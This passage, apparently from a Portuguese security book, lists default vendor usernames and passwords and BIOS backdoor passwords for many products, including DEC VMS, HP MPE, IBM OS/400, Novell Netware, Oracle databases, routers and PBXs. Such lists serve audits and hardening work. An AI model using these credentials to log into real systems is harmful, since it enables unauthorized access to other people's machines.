Compaq Insight Manager user public User
Compaq PC BIOS Console
n/a Compaq
Admin
Compualynx
Cproxy Server All Versions
Multi administrator asecret Admin
Compualynx
Cmail Server All Versions
Multi administrator asecret Admin
Compualynx
SCM All Versions
Multi administrator asecret Admin
Concord PC BIOS n/a last Admin
Crystalview
OutsideView 32 Crystal Admin
CTX International
PC BIOS Console
n/a CTX_123
Admin
CyberMax
PC BIOS Console
n/a Congress
Admin
Daewoo PC BIOS Console
n/a Daewuu Admin
Dallas Semiconductors
TINI embedded JAVA Module
<= 1.0
Telnet root tini Admin
Data General
AOS/VS Multi operator operator Admin
Data General
AOS/VS Multi op op Admin
Data General
AOS/VS Multi op operator Admin
Datacom BSASX/101 n/a letmein Admin
Datacom NSBrowse Multi sysadm sysadm Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
309
Daytek PC BIOS Console
n/a Daytec Admin
Debian Linux LILO Default
2.2
Console
n/a tatercounter2000
Admin
Dell PC BIOS Console
n/a Dell Admin
Develcon
Orbitor Default Console
n/a BRIDGE
Admin
Develcon
Orbitor Default Console
n/a password
Admin
Dictaphone
ProLog NETOP (none)
Dictaphone
ProLog NETWORK NETWORK
Dictaphone
ProLog PBX PBX
Digicorp Viper Telnet n/a BRIDGE
Admin
Digicorp Viper Telnet n/a password
Admin
Digital Equipment
DEC-10 Multi 1 syslib Admin
Digital Equipment
DEC-10 Multi 1 operator Admin
Digital Equipment
DEC-10 Multi 1 manager
Admin
Digital Equipment
DEC-10 Multi 2 maintain
Admin
Digital Equipment
DEC-10 Multi 2 syslib Admin
Digital Equipment
DEC-10 Multi 2 manager
Admin
Digital Equipment
DEC-10 Multi 2 operator Admin
Digital Equipment
DEC-10 Multi 30 games User
Digital Equipment
DEC-10 Multi 5 games User
Digital Equipment
DEC-10 Multi 7 maintain
User
Digital Equipment
DecServer Multi n/a ACCESS
Admin
Digital Equipment
DecServer Multi n/a SYSTEM
Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
310
Digital Equipment
IRIS Multi accounting accounting
Admin
Digital Equipment
IRIS Multi boss boss Admin
Digital Equipment
IRIS Multi demo demo User
Digital Equipment
IRIS Multi manager manager
Admin
Digital Equipment
IRIS Multi PDP11 PDP11 User
Digital Equipment
IRIS Multi PDP8 PDP8 User
Digital Equipment
IRIS Multi software software
User
Digital Equipment
PC BIOS Console
n/a komprie Admin
Digital Equipment
RSX Multi 1,1 SYSTEM
Admin
Digital Equipment
RSX Multi BATCH BATCH User
Digital Equipment
RSX Multi SYSTEM MANAGER
Admin
Digital Equipment
RSX Multi SYSTEM SYSTEM
Admin
Digital Equipment
RSX Multi USER USER User
Digital Equipment
Terminal Server Port 7000
n/a access User
Digital Equipment
Terminal Server Port 7000
n/a system Admin
Digital Equipment
VMS Multi ALLIN1 ALLIN1
Digital Equipment
VMS Multi ALLIN1MAIL ALLIN1MAIL
Digital Equipment
VMS Multi ALLINONE ALLINONE
Digital Equipment
VMS Multi BACKUP BACKUP
Terrorismo Tecnológico Aprenda Para Sobreviver
311
Digital Equipment
VMS Multi DCL DCL
Digital Equipment
VMS Multi DECMAIL DECMAIL
Digital Equipment
VMS Multi DECNET DECNET
Digital Equipment
VMS Multi DECNET NONPRIV
Digital Equipment
VMS Multi DECNET DECNET
Digital Equipment
VMS Multi DEFAULT USER
Digital Equipment
VMS Multi DEFAULT DEFAULT
Digital Equipment
VMS Multi DEMO DEMO
Digital Equipment
VMS Multi FIELD FIELD
Digital Equipment
VMS Multi FIELD SERVICE
Digital Equipment
VMS Multi FIELD TEST
Digital Equipment
VMS Multi FIELD DIGITAL
Digital Equipment
VMS Multi GUEST GUEST
Digital Equipment
VMS Multi HELP HELP
Digital Equipment
VMS Multi HELPDESK HELPDESK
Digital Equipment
VMS Multi HOST HOST
Digital Equipment
VMS Multi HOST HOST
Digital Equipment
VMS Multi INFO INFO
Digital Equipment
VMS Multi INGRES INGRES
Terrorismo Tecnológico Aprenda Para Sobreviver
312
Digital Equipment
VMS Multi LINK LINK
Digital Equipment
VMS Multi MAILER MAILER
Digital Equipment
VMS Multi MBMANAGER MBMANAGER
Digital Equipment
VMS Multi MBWATCH MBWATCH
Digital Equipment
VMS Multi NETCON NETCON
Digital Equipment
VMS Multi NETMGR NETMGR
Digital Equipment
VMS Multi NETNONPRIV NETNONPRIV
Digital Equipment
VMS Multi NETPRIV NETPRIV
Digital Equipment
VMS Multi NETSERVER NETSERVER
Digital Equipment
VMS Multi NETSERVER NETSERVER
Digital Equipment
VMS Multi NETWORK NETWORK
Digital Equipment
VMS Multi NEWINGRES NEWINGRES
Digital Equipment
VMS Multi NEWS NEWS
Digital Equipment
VMS Multi OPERVAX OPERVAX
Digital Equipment
VMS Multi POSTMASTER
POSTMASTER
Digital Equipment
VMS Multi PRIV PRIV
Digital Equipment
VMS Multi REPORT REPORT
Digital Equipment
VMS Multi RJE RJE
Digital Equipment
VMS Multi STUDENT STUDENT
Terrorismo Tecnológico Aprenda Para Sobreviver
313
Digital Equipment
VMS Multi SYS SYS
Digital Equipment
VMS Multi SYSMAINT SYSMAINT
Digital Equipment
VMS Multi SYSMAINT SERVICE
Digital Equipment
VMS Multi SYSMAINT DIGITAL
Digital Equipment
VMS Multi SYSTEM SYSTEM
Digital Equipment
VMS Multi SYSTEM MANAGER
Digital Equipment
VMS Multi SYSTEM OPERATOR
Digital Equipment
VMS Multi SYSTEM SYSLIB
Digital Equipment
VMS Multi SYSTEST UETP
Digital Equipment
VMS Multi SYSTEST_CLIG
SYSTEST_CLIG
Digital Equipment
VMS Multi SYSTEST_CLIG
SYSTEST
Digital Equipment
VMS Multi TELEDEMO TELEDEMO
Digital Equipment
VMS Multi TEST TEST
Digital Equipment
VMS Multi UETP UETP
Digital Equipment
VMS Multi USER PASSWORD
Digital Equipment
VMS Multi USERP USERP
Digital Equipment
VMS Multi VAX VAX
Digital Equipment
VMS Multi VMS VMS
D-Link hubs/switches Telnet D-Link D-Link
Dynix Library
Dynix Multi circ <social sec #>
User
Terrorismo Tecnológico Aprenda Para Sobreviver
314
Systems
Dynix Library Systems
Dynix Multi LIBRARY (none) User
Dynix Library Systems
Dynix Multi SETUP (none) Admin
Efficient Speedstream DSL
Telnet n/a admin Admin
Elsa LANCom Office ISDN Router
800/1000/1100
Telnet n/a cisco Admin
Elsa LANCom Office ISDN Router
800/1000/1100
Telnet n/a (none) Admin
Enox PC BIOS Console
n/a xo11nE Admin
Epox PC BIOS Console
n/a central Admin
Ericsson Ericsson Acc netman netman
Flowpoint
DSL 2000
Telnet admin admin Admin
Flowpoint
DSL Telnet n/a password
Admin
Flowpoint
Flowpoint/2000 ADSL
Telnet n/a (none) Admin
Freetech PC BIOS Console
n/a Posterie Admin
Galacticomm
Major BBS Multi Sysop Sysop Admin
GuardOne
Restrictor Multi n/a guardone
Admin
GuardOne
BizGuard Multi n.a guardone
Admin
glFtpD glFtpD all
Console
glftpd glftpd Admin
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi ADVMAIL HPOFFICE,DATA
Terrorismo Tecnológico Aprenda Para Sobreviver
315
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi ADVMAIL HP
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD SUPPORT
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD MGR
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD SERVICE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD MANAGER
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD HPP187,SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD LOTUS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD HPWORD,PUB
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi FIELD HPONLY
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi HELLO MANAGER.SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi HELLO MGR.SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi HELLO FIELD.SUPPORT
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi HELLO OP.OPERATOR
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MAIL MAIL
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MAIL REMOTE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MAIL TELESUP
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MAIL HPOFFICE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MAIL MPE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER TCH
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER SECURITY
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER ITF3000
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER HPOFFICE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER COGNOS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MANAGER TELESUP
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGE VESOFT
Hewlett- HP 2000/3000 Multi MGE VESOF
Terrorismo Tecnológico Aprenda Para Sobreviver
316
Packard MPE/xx T
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR CAROLIAN
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR VESOFT
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR XLSERVER
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR SECURITY
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR TELESUP
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPDESK
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR CCC
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR CNAS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR WORD
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR COGNOS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR ROBELLE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPOFFICE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPONLY
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPP187
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPP189
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR HPP196
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR INTX3
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR ITF3000
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR NETBASE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR REGO
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR RJE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi MGR CONV
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi OPERATOR SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi OPERATOR DISC
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi OPERATOR SYSTEM
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi OPERATOR SUPPORT
Terrorismo Tecnológico Aprenda Para Sobreviver
317
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi OPERATOR COGNOS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi PCUSER SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi RSBCMON SYS
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi SPOOLMAN HPOFFICE
Hewlett-Packard
HP 2000/3000 MPE/xx
Multi WP HPOFFICE
Hewlett-Packard
Vectra Console
n/a hewlpack
Admin
IBM AIX Multi guest (none) User
IBM AIX Multi guest guest User
IBM Ascend OEM Routers
Telnet n/a ascend Admin
IBM OS/400 Multi 11111111 11111111
IBM OS/400 Multi 22222222 22222222
IBM OS/400 Multi ibm password
IBM OS/400 Multi ibm 2222
IBM OS/400 Multi ibm service
IBM OS/400 Multi qpgmr qpgmr
IBM OS/400 Multi qsecofr qsecofr
IBM OS/400 Multi qsecofr 11111111
IBM OS/400 Multi qsecofr 22222222
IBM OS/400 Multi qserv qserv
IBM OS/400 Multi qsrv qsrv
IBM OS/400 Multi qsrvbas qsrvbas
IBM OS/400 Multi qsvr qsvr
IBM OS/400 Multi qsvr ibmcel
IBM OS/400 Multi qsysopr qsysopr
IBM OS/400 Multi quser quser
IBM OS/400 Multi user USERP
IBM OS/400 Multi secofr secofr
IBM OS/400 Multi sedacm secacm
IBM OS/400 Multi sysopr sysopr
IBM PC BIOS Console
n/a IBM Admin
IBM PC BIOS Console
n/a MBIU0 Admin
IBM PC BIOS Console
n/a sertafu Admin
IBM POS CMOS Console
ESSEX
Terrorismo Tecnológico Aprenda Para Sobreviver
318
IBM POS CMOS Console
IPC
IBM VM/CMS Multi $ALOC$ (none)
IBM VM/CMS Multi ADMIN (none)
IBM VM/CMS Multi AP2SVP (none)
IBM VM/CMS Multi APL2PP (none)
IBM VM/CMS Multi AUTOLOG1 (none)
IBM VM/CMS Multi BATCH (none)
IBM VM/CMS Multi BATCH1 (none)
IBM VM/CMS Multi BATCH2 (none)
IBM VM/CMS Multi CCC (none)
IBM VM/CMS Multi CMSBATCH (none)
IBM VM/CMS Multi CMSUSER (none)
IBM VM/CMS Multi CPNUC (none)
IBM VM/CMS Multi CPRM (none)
IBM VM/CMS Multi CSPUSER (none)
IBM VM/CMS Multi CVIEW (none)
IBM VM/CMS Multi DATAMOVE (none)
IBM VM/CMS Multi DEMO1 (none)
IBM VM/CMS Multi DEMO2 (none)
IBM VM/CMS Multi DEMO3 (none)
IBM VM/CMS Multi DEMO4 (none)
IBM VM/CMS Multi DIRECT (none)
IBM VM/CMS Multi DIRMAINT (none)
IBM VM/CMS Multi DISKCNT (none)
IBM VM/CMS Multi EREP (none)
IBM VM/CMS Multi FSFADMIN (none)
IBM VM/CMS Multi FSFTASK1 (none)
IBM VM/CMS Multi FSFTASK2 (none)
IBM VM/CMS Multi GCS (none)
IBM VM/CMS Multi IDMS (none)
IBM VM/CMS Multi IDMSSE (none)
IBM VM/CMS Multi IIPS (none)
IBM VM/CMS Multi IPFSERV (none)
IBM VM/CMS Multi ISPVM (none)
IBM VM/CMS Multi IVPM1 (none)
IBM VM/CMS Multi IVPM2 (none)
IBM VM/CMS Multi MAINT (none)
IBM VM/CMS Multi MOESERV (none)
IBM VM/CMS Multi NEVIEW (none)
Terrorismo Tecnológico Aprenda Para Sobreviver
319
IBM VM/CMS Multi OLTSEP (none)
IBM VM/CMS Multi OP1 (none)
IBM VM/CMS Multi OPERATNS (none)
IBM VM/CMS Multi OPERATOR (none)
IBM VM/CMS Multi PDMREMI (none)
IBM VM/CMS Multi PENG (none)
IBM VM/CMS Multi PROCAL (none)
IBM VM/CMS Multi PRODBM (none)
IBM VM/CMS Multi PROMAIL (none)
IBM VM/CMS Multi PSFMAINT (none)
IBM VM/CMS Multi PVM (none)
IBM VM/CMS Multi RDM470 (none)
IBM VM/CMS Multi ROUTER (none)
IBM VM/CMS Multi RSCS (none)
IBM VM/CMS Multi RSCSV2 (none)
IBM VM/CMS Multi SAVSYS (none)
IBM VM/CMS Multi SFCMI (none)
IBM VM/CMS Multi SFCNTRL (none)
IBM VM/CMS Multi SMART (none)
IBM VM/CMS Multi SQLDBA (none)
IBM VM/CMS Multi SQLUSER (none)
IBM VM/CMS Multi SYSADMIN (none)
IBM VM/CMS Multi SYSCKP (none)
IBM VM/CMS Multi SYSDUMP1 (none)
IBM VM/CMS Multi SYSERR (none)
IBM VM/CMS Multi SYSWRM (none)
IBM VM/CMS Multi TDISK (none)
IBM VM/CMS Multi TEMP (none)
IBM VM/CMS Multi TSAFVM (none)
IBM VM/CMS Multi VASTEST (none)
IBM VM/CMS Multi VM3812 (none)
IBM VM/CMS Multi VMARCH (none)
IBM VM/CMS Multi VMASMON (none)
IBM VM/CMS Multi VMASSYS (none)
IBM VM/CMS Multi VMBACKUP (none)
IBM VM/CMS Multi VMBSYSAD (none)
IBM VM/CMS Multi VMMAP (none)
IBM VM/CMS Multi VMTAPE (none)
IBM VM/CMS Multi VMTLIBR (none)
Terrorismo Tecnológico Aprenda Para Sobreviver
320
IBM VM/CMS Multi VMUTIL (none)
IBM VM/CMS Multi VSEIPO (none)
IBM VM/CMS Multi VSEMAINT (none)
IBM VM/CMS Multi VSEMAN (none)
IBM VM/CMS Multi VTAM (none)
IBM VM/CMS Multi VTAMUSER (none)
Intel Shiva Multi Guest (none) User
Intel Shiva Multi root (none) Admin
Intel Shiva Lanrovers Multi root (none) Admin
Intel LanRover VPN Gateway
< 6.0
Multi n/a isolation Admin
Intel LanRover VPN Gateway
6.0 >
Multi n/a shiva Admin
Interbase
Interbase Database Server
All
Multi SYSDBA masterkey
Admin
IRC IRC Daemon IRC n/a FOOBAR
Acess
Iwill PC BIOS Console
n/a iwill Admin
JD Edwards
WorldVision/OneWorld
All(?)
TCP 1964
JDE JDE Admin/SECOFR
Jetform Jetform Design HTTP Jetform (none) Admin
JetWay PC BIOS Console
n/a spooml Admin
Joss Technology
PC BIOS Console
n/a 57gbzb Admin
Joss Technology
PC BIOS Console
n/a technolgi
Admin
Lantronics
Lantronics Terminal Server
TCP 7000
n/a access Admin
Lantronics
Lantronics Terminal Server
TCP 7000
n/a system Admin
Leading Edge
PC BIOS Console
n/a MASTER
Admin
Linksys DSL Telnet n/a admin Admin
Linux Slackware Multi gonzo (none) User
Linux Slackware Multi satan (none) User
Linux Slackware Multi snake (none) User
Linux UCLinux for UCSIMM
Multi root uClinux Admin
Livingston
IRX Router Telnet !root (none)
Terrorismo Tecnológico Aprenda Para Sobreviver
321
Livingston
Livingston Portmaster 3
Telnet !root (none)
Livingston
Officerouter Telnet !root (none)
Lucent System 75 Multi bciim bciimpw
Lucent System 75 Multi bcim bcimpw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcms bcmspw
Lucent System 75 Multi bcnas bcnaspw
Lucent System 75 Multi blue bluepw
Lucent System 75 Multi browse browsepw
Lucent System 75 Multi browse looker
Lucent System 75 Multi craft craft
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi craft craftpw
Lucent System 75 Multi cust custpw
Lucent System 75 Multi enquiry enquirypw
Lucent System 75 Multi field support
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads indspw
Lucent System 75 Multi inads inads
Lucent System 75 Multi init initpw
Lucent System 75 Multi locate locatepw
Lucent System 75 Multi maint maintpw
Lucent System 75 Multi maint rwmaint
Lucent System 75 Multi nms nmspw
Lucent System 75 Multi pw pwpw
Lucent System 75 Multi rcust rcustpw
Lucent System 75 Multi support supportpw
Lucent System 75 Multi sysadm sysadmpw
Lucent System 75 Multi sysadm admpw
Lucent System 75 Multi sysadm syspw
Lucent System 75 Multi tech field
M Technology
PC BIOS Console
n/a mMmM Admin
MachSpeed
PC BIOS Console
n/a sp99dd Admin
Magic-Pro
PC BIOS Console
n/a prost Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
322
Megastar
PC BIOS Console
n/a star Admin
Mentec Micro/RSX Multi MICRO RSX Admin
Micron PC BIOS Console
n/a sldkj754 Admin
Micron PC BIOS Console
n/a xyzall Admin
Micronics
PC BIOS Console
n/a dn_04rjc
Admin
Microplex
Print Server Telnet root root Admin
Microsoft
Windows NT Multi (null) (none) User
Microsoft
Windows NT Multi Administrator Administrator
Admin
Microsoft
Windows NT Multi Administrator (none) Admin
Microsoft
Windows NT Multi Guest Guest User
Microsoft
Windows NT Multi Guest (none) User
Microsoft
Windows NT Multi IS_$hostname (same) User
Microsoft
Windows NT Multi User User User
Mintel Mintel PBX n/a SYSTEM
Admin
Motorola Cablerouter Telnet cablecom router Admin
MySQL MySQL all versions
root (none) Admin
NCR NCR UNIX Multi ncrm ncrm Admin
NetGenesis
NetAnalysis Web Reporting
HTTP naadmin naadmin
Admin
Netopia Netopia 7100 Telnet (none) (none) Admin
Netopia Netopia 9500 Telnet netopia netopia Admin
NetworkICE
ICECap Manager 2.0.22 <
8081 iceman (none) Admin
NeXT NeXTStep Multi me (none) User
NeXT NeXTStep Multi root NeXT Admin
NeXT NeXTStep Multi signa signa User
Nimble PC BIOS Console
n/a xdfk9874t3
Admin
Nortel Accelar (Passport) 1000 séries routing switches
Multi l2 l2 Layer 2 Read Write
Nortel Accelar (Passport) 1000 séries routing
Multi l3 l3 Layer 3 (and layer 2) Read
Terrorismo Tecnológico Aprenda Para Sobreviver
323
switches Write
Nortel Accelar (Passport) 1000 séries routing switches
Multi ro ro Read Only
Nortel Accelar (Passport) 1000 séries routing switches
Multi rw rw Read Write
Nortel Accelar (Passport) 1000 séries routing switches
Multi rwa rwa Read Write All
Nortel Extranet Switches
Multi admin setup Admin
Nortel Meridian PBX Serial login 0000
Nortel Meridian PBX Serial spcl 0000
Nortel Remote Office 9150
Client admin root Admin
Novell Netware Multi ADMIN ADMIN
Novell Netware Multi ADMIN (none)
Novell Netware Multi ARCHIVIST (none)
Novell Netware Multi ARCHIVIST ARCHIVIST
Novell Netware Multi BACKUP (none)
Novell Netware Multi BACKUP BACKUP
Novell Netware Multi CHEY_ARCHSVR
CHEY_ARCHSVR
Novell Netware Multi CHEY_ARCHSVR
(none)
Novell Netware Multi FAX FAX
Novell Netware Multi FAX (none)
Novell Netware Multi FAXUSER FAXUSER
Novell Netware Multi FAXUSER (none)
Novell Netware Multi FAXWORKS (none)
Novell Netware Multi FAXWORKS FAXWORKS
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY GATEWAY
Novell Netware Multi GATEWAY (none)
Novell Netware Multi GUEST TSEUG
Novell Netware Multi GUEST GUESTGUEST
Novell Netware Multi GUEST GUESTGUE
Novell Netware Multi GUEST GUEST
Terrorismo Tecnológico Aprenda Para Sobreviver
324
Novell Netware Multi GUEST (none)
Novell Netware Multi HPLASER (none)
Novell Netware Multi HPLASER HPLASER
Novell Netware Multi LASER (none)
Novell Netware Multi LASER LASER
Novell Netware Multi LASERWRITER
LASERWRITER
Novell Netware Multi LASERWRITER
(none)
Novell Netware Multi MAIL (none)
Novell Netware Multi MAIL MAIL
Novell Netware Multi POST (none)
Novell Netware Multi POST POST
Novell Netware Multi PRINT (none)
Novell Netware Multi PRINT PRINT
Novell Netware Multi PRINTER (none)
Novell Netware Multi PRINTER PRINTER
Novell Netware Multi ROOT (none)
Novell Netware Multi ROOT ROOT
Novell Netware Multi ROUTER (none)
Novell Netware Multi SABRE (none)
Novell Netware Multi SUPERVISOR NETFRAME
Novell Netware Multi SUPERVISOR NFI
Novell Netware Multi SUPERVISOR NF
Novell Netware Multi SUPERVISOR HARRIS
Novell Netware Multi SUPERVISOR SUPERVISOR
Novell Netware Multi SUPERVISOR (none)
Novell Netware Multi SUPERVISOR SYSTEM
Novell Netware Multi TEST TEST
Novell Netware Multi TEST (none)
Novell Netware Multi USER_TEMPLATE
(none)
Novell Netware Multi USER_TEMPLATE
USER_TEMPLATE
Novell Netware Multi WANGTEK (none)
Novell Netware Multi WANGTEK WANGTEK
Novell Netware Multi WINDOWS_PASSTHRU
WINDOWS_PASSTHRU
Novell Netware Multi WINDOWS_PASSTHRU
(none)
Novell Netware Multi WINSABRE SABRE
Terrorismo Tecnológico Aprenda Para Sobreviver
325
Novell Netware Multi WINSABRE WINSABRE
Nurit PC BIOS Console
$system (none) Admin
Oracle Oracle RDBMS 7,8
Multi ADAMS WOOD
Oracle Oracle RDBMS 7,8
Multi APPLSYS APPLSYS
Oracle Oracle RDBMS 7,8
Multi APPS APPS
Oracle Oracle RDBMS 7,8
Multi AURORA@ORB@UNAUTHENTICATED
INVALID
Oracle Oracle RDBMS 7,8
Multi BLAKE PAPER
Oracle Oracle RDBMS 7,8
Multi CLARK CLOTH
Oracle Oracle RDBMS 7,8
Multi CTXDEMO CTXDEMO
Oracle Oracle RDBMS 7,8
Multi CTXSYS CTXSYS
Oracle Oracle RDBMS 7,8
Multi DBSNMP DBSNMP
RESOURCE and CONNECT roles
Oracle Oracle RDBMS 7,8
Multi DEMO DEMO
Oracle Oracle RDBMS 7,8
Multi JONES STEEL
Oracle Oracle RDBMS 7,8
Multi MDSYS MDSYS
Oracle Oracle RDBMS 7,8
Multi NAMES NAMES
Oracle Oracle RDBMS 7,8
Multi ORDPLUGINS ORDPLUGINS
Oracle Oracle RDBMS 7,8
Multi OUTLN OUTLN
Oracle Oracle RDBMS 7,8
Multi RMAN RMAN
Oracle Oracle RDBMS 7,8
Multi SCOTT TIGER
Oracle Oracle RDBMS 7,8
Multi SYS CHANGE_ON_INSTALL
DBA +
Oracle Oracle RDBMS 7,8
Multi SYSADM SYSADM
Oracle Oracle RDBMS 7,8
Multi SYSTEM MANAGER
Oracle Oracle RDBMS 7,8
Multi TRACESRV TRACE
Oracle Personal Oracle 8 Multi PO8 PO8
Osicom JETXPrint 1000E
Telnet sysadm sysadm Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
326
/B
Osicom JETXPrint 1000E/N
Telnet sysadm sysadm Admin
Osicom JETXPrint 1000T/N
Telnet sysadm sysadm Admin
Osicom JETXPrint 500 E/B
Telnet sysadm sysadm Admin
Osicom NETCommuter Remote Access Server
Telnet debug d.e.b.u.g User
Osicom NETCommuter Remote Access Server
Telnet echo echo User
Osicom NETCommuter Remote Access Server
Telnet guest guest User
Osicom NETCommuter Remote Access Server
Telnet Manager Manager Admin
Osicom NETCommuter Remote Access Server
Telnet sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet
debug d.e.b.u.g User
Osicom NETPrint 1000E/D Telnet
debug d.e.b.u.g User
Osicom NETPrint 1000E/NDS Telnet
debug d.e.b.u.g User
Osicom NETPrint 1500E/N Telnet
debug d.e.b.u.g User
Osicom NETPrint 2000E/N Telnet
debug d.e.b.u.g User
Osicom NETPrint 1500 E/B Telnet
echo echo User
Osicom NETPrint 1000E/D Telnet
echo echo User
Terrorismo Tecnológico Aprenda Para Sobreviver
327
Osicom NETPrint 1000E/NDS Telnet
echo echo User
Osicom NETPrint 1500E/N Telnet
echo echo User
Osicom NETPrint 2000E/N Telnet
echo echo User
Osicom NETPrint 1500 E/B Telnet
guest guest User
Osicom NETPrint 1000E/D Telnet
guest guest User
Osicom NETPrint 1000E/NDS Telnet
guest guest User
Osicom NETPrint 1500E/N Telnet
guest guest User
Osicom NETPrint 2000E/N Telnet
guest guest User
Osicom NETPrint 1500 E/B Telnet
Manager Manager Admin
Osicom NETPrint 1000E/D Telnet
Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet
Manager Manager Admin
Osicom NETPrint 1500E/N Telnet
Manager Manager Admin
Osicom NETPrint 2000E/N Telnet
Manager Manager Admin
Osicom NETPrint 1000E/NDS Telnet
sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet
sysadm sysadm Admin
Osicom NETPrint 2000E/N Telnet
sysadm sysadm Admin
Osicom NETPrint 1000E/B Telnet
sysadm sysadm Admin
Osicom NETPrint 2000E/B Telnet
sysadm sysadm Admin
Osicom NETPrint 1000E/N Telnet
sysadm sysadm Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
328
Osicom NETPrint 2000E/N Telnet
sysadm sysadm Admin
Osicom NETPrint 1000 T/B Telnet
sysadm sysadm Admin
Osicom NETPrint 2000 T/B Telnet
sysadm sysadm Admin
Osicom NETPrint 1000 T/N Telnet
sysadm sysadm Admin
Osicom NETPrint 2000 T/N Telnet
sysadm sysadm Admin
Osicom NETPrint 1500 E/B Telnet
sysadm sysadm Admin
Osicom NETPrint 1500E/N Telnet
sysadm sysadm Admin
Osicom NETPrint 1500T/N Telnet
sysadm sysadm Admin
Osicom NETPrint 1000E/D Telnet
sysadm sysadm Admin
Osicom NETPrint 500 E/B Telnet
sysadm sysadm Admin
Osicom NETPrint 500 E/N Telnet
sysadm sysadm Admin
Osicom NETPrint 500 T/B Telnet
sysadm sysadm Admin
Osicom NETPrint 500 T/N Telnet
sysadm sysadm Admin
Osicom Osicom Plus T1/PLUS 56k
Telnet
write private
Packard Bell
PC BIOS Console
n/a bell9 Admin
Prime PrimeOS Multi
dos dos User
Prime PrimeOS Multi
guest guest User
Prime PrimeOS Multi
guest1 guest User
Prime PrimeOS Multi
guest1 guest1 User
Prime PrimeOS Multi
fam fam User
Prime PrimeOS Multi
mail mail User
Terrorismo Tecnológico Aprenda Para Sobreviver
329
Prime PrimeOS Multi
maint maint User
Prime PrimeOS Multi
mfd mfd User
Prime PrimeOS Multi
netlink netlink User
Prime PrimeOS Multi
prime prime User
Prime PrimeOS Multi
prime primeos User
Prime PrimeOS Multi
primeos prime User
Prime PrimeOS Multi
primeos primeos User
Prime PrimeOS Multi
primenet primenet User
Prime PrimeOS Multi
primenet primeos User
Prime PrimeOS Multi
primos_cs
primos User
Prime PrimeOS Multi
primos_cs
prime User
Prime PrimeOS Multi
system prime Admin
Prime PrimeOS Multi
system system Admin
Prime PrimeOS Multi
tele tele User
Prime PrimeOS Multi
test test User
QDI PC BIOS Console
n/a QDI Admin
QDI SpeedEasy BIOS Console
n/a lesarotl Admin
Quantex PC BIOS Console
n/a teX1 Admin
Quantex PC BIOS Console
n/a xljlbj Admin
Raidzone
raid arrays n/a raidzone
Ramp Networks
WebRamp wradmin trancell
RapidStream
RapidStream Appliances
Multi
rsadmin (null) Admin
Raritan KVM Switches admin raritan Admin
RedHat Redhat 6.2 HTTP
piranha q User
RedHat Redhat 6.2 HTTP
piranha piranha User
Remedy Remedy Multi
ARAdmin
AR#Admin#
Admin
Terrorismo Tecnológico Aprenda Para Sobreviver
330
